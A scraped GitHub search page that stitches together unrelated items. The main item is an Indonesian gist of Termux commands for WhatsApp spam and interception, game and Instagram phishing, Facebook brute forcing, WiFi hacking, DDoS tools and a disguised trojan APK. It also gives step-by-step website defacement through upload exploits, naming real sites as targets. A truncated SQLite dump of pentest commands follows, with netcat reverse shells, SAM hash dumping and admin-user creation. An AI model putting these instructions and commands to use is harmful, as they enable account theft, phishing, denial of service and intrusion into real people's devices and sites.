Found 71 repositories(showing 30)
Rizalcahdemak
Skip to content arysandi/kumpulan kode di termux Created 3 years ago • Report abuse Code Revisions 1 Stars 105 Forks 8 kumpulan kode di termux KUMPULAN CODE TERMUX LENGKAP | SPAM CHAT WHATSAPP || nggk usah nyepam gw -_* atau hp lu gw ledakin!!#@vms $ pkg update && pkg upgrade Setelah mengupdate dan mengupgrade termux ketikan perintah berikut : $ pkg install python2 (y/n pilih y) $ pkg install php (y/n pilih y) $ pkg install git (y/n pilih y) Setalah mengikuti perintah di atas waktu-nya kita clonning tool-nya : $ git clone https://github.com/siputra12/prank.git Setelah proses cloning selesai kita move on dari perintah di atas dan ketikan perintah ini : $ cd prank $ ls $ php wa.php Kemudian masukan Nomor WhatsApp yang kalian ingin spam contoh : 085710917169 kemudian enter pada pilihan y/n pilih y .. .welcome back to me catatan:).... #@vms " jngan lupa subcribe pak *VEMAS DARK* -_-... (:" "phising game" (mobile legends dan clash of clan) $apt update $apt upgrade -y $pkg install python2 -y $pkg install apache2 $pkg install php -y $pkg install git $git clone https://github.com/Senitopeng/PhisingGame $ls $cd PhisingGame $python2 phising.py *Gunain dengan bijak cuk -_-* Cara Install OSIF ( Open Source Information Facebook ) $ pkg install python2 $ git clone https://github.com/ciku370/OSIF $ cd OSIF $ pip2 install -r requirements.txt Dan cara menjalankannya menggunakan perintah : python2 osif.py by: *Vdk* *~CARA SADAP WA~* *_SeNaNg-SeNaNg H4CK1NG MR.STAH_* $pkg update && pkg upgrade $pkg install git $pkg install curl $git clone https://github.com/AndriGanz/whatshack $cd whatshack $ls $sh whatshack.sh *~Jangan salah gunakan~* Tutorial termux Silahkan perdalami... D-tect tool Cara Install D-tect tool di android termux (command ) : $ apt install git $ apt install python2 $ git clone https://github.com/shawarkhanethicalhacker/D-TECT $ ls $ cd D-TECH $ chmod +x d-tect.py $ python2 d-tect.py 2. cara uninstall tool termux rm -rf toolsnya 3. cara buat virus cd /sdcard cd vbug ls chmod vbug.py chmod -v vbug.py python2 vbug.py 4. irssi /connet irc.freenode.net /nick w3wandroid /join #modol _________________________ DDOS via Termux ———————————— 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 104.27.146.125 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py _________________________________________ Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy ________________________________________ Musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak musik ________________________________________ Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah ________________________________________ Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya _______________________________________ Menampilkan animasi kereta $ pkg install sl $ sl _______________________________________ menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch _______________________________________ menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya _______________________________________ Cara Mendengarkan Yotuube di termux $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dgn mengetik nomornya. Tutorial membuat virus seperti aplikasi aslinya Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug Here 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh ———————— Auto boot fb git clone https://github.com/Senitopeng/BotFbBangDjon.git cd BotFbBangDjon python2 bangdjon.py melihat id fb https://findmyfbid.in/ Autoreaction Facebook git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction •TOOLS²TERMUX.P3 21.TOOLS SQLMAP apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap cd sqlmap python2 sqlmap.py ============================= 22.TUTORIAL PHISING INSTAGRAM VIA TERMUX pkg update pkg upgrade pkg install python2 pkg install git clear git clone https://github.com/evait-secutiry/weeman.git cd ls cd weeman python2 weeman.py show set url http://dewopanel.host22.com/masuk.php set port 8080 set action_url http://dewopanel.host22.com/masuk.php run ============================= 23.TUTORIAL MENAMBAH FOLLOWERS&LIKE INSTAGRAM Kegunaan untuk menambah follower dan like ig pkg update pkg upgrade pkg install python2 pkg install ruby gem install lolcat pkg install git git clone https://github.com/Hanzelnutt/instabot cd instabot ls pip2 install -r requirements.txt bash instabot ============================= 24.TUTOR HACK WIFI KHUSUS ROOT apt update apt upgrade apt install git git clone https://github.com/esc0rtd3w/wifi-hacker ls cd wifi-hacker ls chmod +x wifi-hacker.sh ls ./wifi-hacker.sh ============================= 25.TOOLS xNOT_FOUND *VER1* apt update && apt upgrade pkg install git pkg install gem pkg install figlet gem install lolcat git clone https://github.com/hatakecnk/xNot_Found cd xNot_Found sh xNot_Found.sh ============================= 26.HACK FB Nih ada tutor buat lewat TERMUX buat hack FB apt update && apt upgrade apt install python apt install python2 apt install ruby apt install git apt install wget apt install curl pip2 install mechanize pip2 install requests git clone https://github.com/hnov7/mbf *tunggu hingga selesai,jika sudah selesai *silahkan buka tab baru atau new session lalu ketik : cd mbf python2 mbf.py ============================= 27.HACK GMAIL apt-get update && apt-get upgrade apt-get install git apt-get install python python-pip python-setuptools pip install scapy git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher< python setup.py install cd wifiphisher python wifiphisher ============================= 28.BERMAIN MOON-BUGGY pkg install moon-buggy moon-buggy ============================= 29.PERKIRAAN CUACA curl http://wttr.in/ (lokasi) ============================= 30.BROWSING DI TERMUX pkg install w3m w3m www.google.com Linknya bsa diubah ============================= [8/10 19.49] Yovis Si Wibub: Apt update Apt upgrade Apt install mechanize Apt install git git clone http://github.com/hnov7/mbf cd mbf python2 mbf. py Mbf tanpa username dan password. Jdi tinggl make aja [8/10 19.49] Yovis Si Wibub: --------------------------TOTUR MBF-----------------------$ pkg update && pkg upgrade $ pkg install python2 $ pip2 install mechanize $ git clone https://github.com/pirmansx/mbf Cara Menjalankannya : $ ls $ cd mbf $ python2 MBF.py [9/10 17.25] *~I⃟i⃟i⃟i⃟i⃟i⃟i⃟i⃟i⃟i⃟i⃟: Memper Cantik/Melihat V.Android Termux $ pkg update && pkg upgrade $ pkg install ruby cowsay toilet figlet $ pkg install neofetch $ pkg install nano $ gem install lolcat $ cd ../usr/etc $ nano bash.bashrc cowsay -f eyes Cyber | lolcat toilet -f standard Indonesia -F gay neofetch date | lolcat ✓ Hack FB rombongan $ apt update && apt upgrade $ pkg install python2 git $ pip2 install mechanize $ git clone http://github.com/pirmansx/mbf $ ls $ cd mbf $ python2 MBF.py ✓ Hack FB ngincer $ Apt update ( Enter ) $ Apt upgrade ( Enter ) $ Apt install python2 ( Enter ) $ pip2 install urllib3 chardet certifi idna requests ( Enter ) $ apt install openssl curl ( Enter ) $ pkg install libcurl ( Enter ) $ ln /sdcard ( Enter ) $ cd /sdcard ( Enter ) $ python2 fbbrute.py ( Enter ) ✓ Hack Gmail apt-get update && apt-get upgrade $ apt-get install git $ apt-get install python python-pip python-setuptools $ pip install scapy $ git clone https://github.com/wifiphisher/wifiphisher.git $ cd wifiphisher< $ python setup.py install $ cd wifiphisher $ python wifiphisher Nih yang mau hack WiFi Khusus root $apt update $apt upgrade $apt install git $git clone https://github.com/esc0rtd3w/wifi-hacker $ls $cd Ni KUMPULAN TUTOR TERMUX [X SCREW UP X] *HACK INSTAGRAM* ( sosial engineering) $ apt update && apt upgrade $ pkg install python $ pkg install git $ pkg install nano $ git clone https://github.com/avramit/instahack.git $ ls $ cd instahack $ ls $ pip install requests $ cd instahack $ nano pass.txt $ cat pass.txt $ ls $ python hackinsta.py Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com Lacak IP git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak TOOL DDOS VIA TERMUX 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py RED_HAWK tool $ apt update $ apt install git $ git clone https://github.com/Tuhinshubhra/RED_HAWK $ cd RED_HAWK $ chmod +x rhawk.php $ apt install php $ ls $ php rhawk.php ```Install webdav ``` $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav Tutorial Install *Tools-B4J1N64Nv5* pkg install update pkg install git pkg install toilet pkg install figlet pip2 install lolcat git clone https://github.com/DarknessCyberTeam/B4J1N64Nv5 cd B4J1N64Nv5 sh B4J1N64N.sh cara install termux ubuntu - apt update/pkg update - apt upgrade/pkg upgrade - pkg install git - pkg install proot - pkg install wget - git clone https://github.com/Neo-Oli/termux-ubuntu - cd termux-ubuntu - chmod +x ubuntu.sh - pip install -r requirements.txt - ./ubuntu.sh Untuk menjalankan - ./start.sh Cara install github tembak XL Dari awal 1.pkg upgrade 2.pkg update 3.pkg install git 4.pkg install python 5.git clone https://github.com/albertoanggi/xl-py 6.pip install -r requirements.txt 7.chmod +x app.py 8.python/python2 app.py *Install admin finder in termux* $ apt update && apt upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/AdheBolo/AdminFinder *Menjalankan* $ ls $ cd AdminFinder $ chmod 777 AdminFinder.py $ python2 AdminFinder.py *Cara install tool Mr.Rv1.1* $apt update && apt upgrade $pkg install git $pkg install gem $pkg install figlet $gem install lolcat $git clone https://github.com/Mr-R225/Mr.Rv1.1 $cd Mr.Rv1.1 $sh Mr.Rv1.1.sh tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools TOOL FSOCIETY $ git clone https://github.com/manisso/fsociety $ cd fsociety $ ./install.sh $ ls $ python2 fsociety.py SQLMAP apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap https://github.com/sqlmapproject/sqlmap.git cd sqlmap Python2 sqlmap.py Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run TOOL D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu… $ cd termux-ubuntu $ chmod +x ubuntu.sh $ ./ubuntu.sh $ ./start.sh (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py DEFACE Hacking Script-Deface $apt update $apt upgrade $apt install git $apt install python2 $git clone https://github.com/Ubaii/script-deface-creator $ls $cd script-deface-creator $ls $chmod +x create.py $ls $python2 create.py done semoga bisa bikin script Html CARA DEFACE Cara1 Siapkan script sendiri.. 1.buka browser kalian apa saja terserah lalu ke google 2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search 3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut (sitefinity/usercontrols/dialog/documenteditordialog.aspx) tanpa buka tutup kurung! E http://sitetarget*org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx 4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian 5.klik yang di bawah nya tunggu sampai loading selesai 6.tambah link target tadi dengan (/files) contoh http://sitetarget*org/files/namascriptdefacekalian.html lalu klik search 7.selesai!! Cara2 Method/metode KCFinder Inurl:/kcfinder/browse.php Inurl:/Kcfinder/ Langsung saja upload file deface anda,lalu panggil dengan tambahan /file/namasckamu.html Contoh: https://basukiwater.com/kcfinder/browse.php jadi https://basukiwater.com/file/namasckamu.html cara3 Deface Onion.to File Upload Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake Deepweb hehehe... Mari kita Lanjut... Dork : - inurl:/upload site:.onion.to - intext:"Upload" site:.onion.to Live : https://tt3j2x4k5ycaa5zt.onion.to/upload.php Step By Step : 1. Dorking Dulu 2. Pilih Web Target 3. Pilih File yang mau di'upload 4. Tinggal klik Upload => Done 😆 Contoh Target : https://tt3j2x4k5ycaa5zt.onion.to/uploads/lopeyou.html https://danwin1210.me/uploads/lopeyou.html https://temp.xn--wda.fr/e719x8JgJ.html Mirror?! 😆 https://www.defacer.id/296011.html https://www.defacer.id/296024.html cara4 Metode com media Bahan : 1. Dork : - inurl:com_media site:com - inurl:com_media intext:"Upload" 2. Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 3. Upload'an : Format .txt 😁 Live Target : http://www.james-insurance.co.uk/ Step by Step : gunakan Live Targert dulu untuk Uji Coba 😁 1. Masukkan dork : inurl:com_media intext:"Upload" site:co.uk 2. Pilih salah satu Web 3. Masukkan Exploit http://www.james-insurance.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 4. Lalu Upload file dalam tempat upload ( format .txt ) Akses shell ? Tambahkan : /images/namafile.txt contoh : http://www.james-insurance.co.uk/images/fac.txt Nanti Jadi Gini Hasilnyaa.. Mudah Bukan?! Tinggal Upload ke Defacer.id 😁 cara5 [POC] Vulnerability Simplicity Of Upload #Step 1: Dork: “Powered By: © Simplicity oF Upload” #Step 2: Exploit: http://[situstargetkamu]/PATH/upload.php *Tergantung dengan target. #Step 3: llowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html) #Step 4: Preview: http://[situstargetkamu]/upload/[Your File] #Step 5: Live Demo: http://www.railfaneurope.net/pix/upload.php http://www.formplas.com/upload/upload.php Nah, saya kira cukup segitu aja kok, karena mudah tuh tutorial nya. Al in one crip termux $ apt update && apt upgrade $ pkg install php figlet ruby python python2 $ pip2 install lolcat $ git clone https://github.com/Rusmana-ID/rus $ cd $ cd rus $ ls $ sh v2.sh Kontak wa 083879017166 Note: user name:Rusmana Pasword:X-One Load earlier comments... husniawati commented on 3 Dec 2020 Gak bisa bang apa harus membuat file dulu atau gmn semua udah aku ikutin tapi gak bisa bisa Ruok2588 commented on 9 Dec 2020 Taiklah sya01019 commented on 12 Dec 2020 Percuma, , Ini siapa punya blog kayak babi sya01019 commented on 12 Dec 2020 Tampilan aja beda Rasa garam marco97-web commented on 22 Dec 2020 Password.a ga bisa bang Ilham619 commented on 12 Jan 2021 Bang kasih tau cara ambil akun free fire Reyhan720z commented on 13 Feb 2021 Bg sc fb nya gk work azuhry commented on 5 Mar 2021 gak ada yang work 😎 gue bisa Ilham619 commented on 5 Mar 2021 Kode termux untuk hack FB APA Pada tanggal Jum, 5 Mar 2021 01.47, azuhry <notifications@github.com> menulis: … ***@***.**** commented on this gist. ------------------------------ gak ada yang work 😎 gue bisa — You are receiving this because you commented. Reply to this email directly, view it on GitHub <https://gist.github.com/8d49c6cc91e3ecfcdc8c91d8abdd7450#gistcomment-3653833>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ASNZOIQMA54PE3PD5QJV5LLTB7BRLANCNFSM4NBI2DHA> . MR-Bm13 commented on 15 Mar 2021 BULLSHIT LOP 28februari2005 commented on 11 May 2021 Work 100% hmm 🤔🤔🤔 28februari2005 commented on 11 May 2021 Bener work Ya dicoba 🤐🤐🤐 28februari2005 commented on 11 May 2021 Coba aja dulu baru komen jalilcy commented on 25 May 2021 Bang bisa minta tolong. Ajarkan buat hack fb. Sy ingin mengambil fb sya kena hack kazharalyu commented on 6 Jun 2021 Ada yang bisa ada yang gak bisa jalilcy commented on 6 Jun 2021 Saya ingin mengambil kembali akun facebook aku bang di hack orang Pada tanggal Min, 6 Jun 2021 18:55, kazharalyu ***@***.***> menulis: … ***@***.**** commented on this gist. ------------------------------ Ada yang bisa ada yang gak bisa — You are receiving this because you commented. Reply to this email directly, view it on GitHub <https://gist.github.com/8d49c6cc91e3ecfcdc8c91d8abdd7450#gistcomment-3770432>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AUGJUNGESYA6BKWK3RCP7V3TRNH35ANCNFSM4NBI2DHA> . wanted21 commented on 15 Jun 2021 Scrip whatsheck udh ngga bisa ya gan Cloning224 commented on 18 Jun 2021 Ada yg bisa hack akun highs Domino disini, tolong bantu saya. Saya barusan jadi korban Screenshot_2021-06-18-17-52-31-124_com higgs domino mrsimple15 commented on 24 Jun 2021 bang buatin script untuk hack cip domino tanpa pishing akun orang Muhdaghol12 commented on 1 Jul 2021 `` YudhaSaputra11 commented on 27 Jul 2021 bang yang hack wa habis ituu diapain? ardyan212 commented on 7 Nov 2021 Keren bang tools termuxnya https://www.jopamungkas.com aceptt commented on 7 Nov 2021 Mantap sehat selalu bang,top banget boyaniyan commented on 21 Nov 2021 Mantap D4K0TCH4N commented on 11 Feb Gajelas AhmadTaslimfebriyan00 commented on 28 Mar Bang cara pertama kok sering gagal bang Spilis1 commented on 18 May Ada yg bisa by pass Gmail dan ymail BLACKSTARzero commented on 31 May buat yg baru gabung di termux Ini scrft lama gk usah di ikuti MATUN091 commented on 8 Jun Iya cok ini scift lama gak usah di ikutin abssbsjhsjaj commented 18 days ago wkkwwk sc kintil kurang update Leave a comment Footer © 2022 GitHub, Inc. Footer navigation Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About You have no unread notifications
CIRCL
URL Abuse - A Versatile Software for URL review, analysis and black-list reporting
Don-No7
-- -- File generated with SQLiteStudio v3.2.1 on Sun Feb 7 14:58:28 2021 -- -- Text encoding used: System -- PRAGMA foreign_keys = off; BEGIN TRANSACTION; -- Table: Commands CREATE TABLE Commands (Command_No INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Name TEXT REFERENCES Programs (Name) NOT NULL, Description TEXT NOT NULL, Command TEXT, File BLOB); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (1, 'Kerbrute', 'brute single user password', 'kerbrute bruteuers [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (2, 'Kerbrute', 'brute username:password combos from file or stdin', 'kerbrute brutforce [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (3, 'Kerbrute', 'test a single password agains a list of users', 'kerbrute passwordspray [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (4, 'Kerbrute', 'Enumerate valid domain usernames via kerberos', 'kerbrute userenum [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (5, 'Name-That-Hash', 'Find the hash type of a string', 'nth --text ''<hash>''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (6, 'Name-That-Hash', 'Find the hash type of a file', 'nth --file <hash file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (7, 'Nmap', 'scan for vulnerabilites', 'nmap --script vuln <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (8, 'Nikto', 'Scan host for vulnerabilites', 'nikto -h <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (9, 'SMBClient', 'check for misconfigured anonymous login', 'smbclient -L \\\\<HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (10, 'Hydra', 'Brutforce a webpage looking for usernames', 'hydra -l <user wordlist> -p 123 <HOST_IP> http-post-form ''/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=<output string on failure>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (11, 'SMBMap', 'enumerates SMB file shares', 'smbmap -u <user> -p <pass> -H <host IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (12, 'WPScan', 'Enumerate Wordpress website', 'wpscan --url <wp site> --enumerate --plugins-detection', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (13, 'WPScan', 'enumerate though known usernames', 'wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (14, 'PowerShell', 'bypass execution policy', 'powershell.exe -exec bypass', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (15, 'TheHarvester', 'gathering informaiton from online sources', 'theharvester -d <domain> -l <#> -g -b google', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (16, 'Netcat', 'open a listener', 'nc -lvnp <port #>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (17, 'Netcat', 'Connect to computer', 'nc <attacker ip> <attacker port>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (18, 'GoBuster', 'Eunmerate directories on a website with a cookie', 'gobuster dir -u http://<IP> -w <wordlist> -x <extention> -c PHPSESSID=<cookie val>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (19, 'SQLMap', 'map sql at an IP', 'sqlmap -r <IP> --batch --force-ssl', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (20, 'John the Ripper', 'Use wordlist to parse hash', 'john <HASHES_FILE> --wordlist=<wordlist>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (21, 'John the Ripper', 'unencrypt shadow file', 'john <Unshadowed passwds>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (22, 'Unshadow', 'combine /etc/passwd and /etc/shadow file for cracking', 'unshadow <passwd> <shadow>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (23, 'Hashcat', 'crack hashes with a wordlist', 'hashcat -m <hash type> -a 0 -o <output file> <hash file> <wordlist> --force', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (26, 'Enum4Linux', 'basic command', 'enum4linux -a <IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (27, 'SMBClient', 'connect to a SMB share', 'smbclinet //<IP>/<share> -U <username>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (28, 'Netcat', 'connect with shell (-e doest always work)', 'nc -e /bin/sh <ATTACKING-IP> 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (29, 'Netcat', 'connect with shell (-e doest always work)', '/bin/sh | nc ATTACKING-IP 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (30, 'Netcat', 'done on the target', 'rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (31, 'SQLMap', 'Check form for SQL injection', 'sqlmap -o -u "http://meh.com/form/" –forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (32, 'SQLMap', 'automated SQL scan', 'sqlmap -u <URL> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (33, 'CrackMapExec', 'run a mimikatz module', 'crackmapexec smb <target(s)> -u <username> -p <password> --local-auth -M mimikatz', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (34, 'CrackMapExec', 'Command execution', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' -x whoami', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (35, 'CrackMapExec', 'check logged in users', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' --lusers', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (36, 'CrackMapExec', 'dump local SAM hashes', 'crackmapexec <target(s)> -u ''<uesrname>'' -p ''<password>'' --local-auth --sam', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (37, 'CrackMapExec', 'null session login', 'crackmapexec smb <target(s)> -u '''' -p ''''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (38, 'CrackMapExec', 'list modules', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (39, 'CrackMapExec', 'pass the hash', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (41, 'IKE-Scan', 'attack pre shared key with dictionary', 'psk-crack -d </path/to/dictionary> <psk file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (42, 'IKE-Scan', 'If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN', 'ike-scan <IP> -A -id GroupVPN', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (43, 'IKE-Scan', 'to find aggressive mode VPNs and save for use with psk-crack', 'ike-scan <IP> -A -P<file out>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (44, 'John the Ripper', 'crack passwords with korelogic rules', 'for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (45, 'Nmap', 'create a list of ip addresses ', 'nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (46, 'Linux commands', 'mount NFS share on linux', 'mount -t nfs server:/share /mnt/point', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (47, 'PowerShell', 'create new user', 'net user <username> <password> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (48, 'PowerShell', 'add user to a group (normaly Administrators)', 'net localgroup <group> <username> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (49, 'PSK-Crack', 'brute force with specified length and specified chars (if left blank default is 36)', 'psk-crack -b <#> --charset="<charlist>" <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (50, 'PSK-Crack', 'dictianary attack', 'psk-crack -d <file> <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (51, 'SQLMap', 'check form for SQL injection', 'sqlmap -o -u "<url of form>" --forms', NULL); INSERT 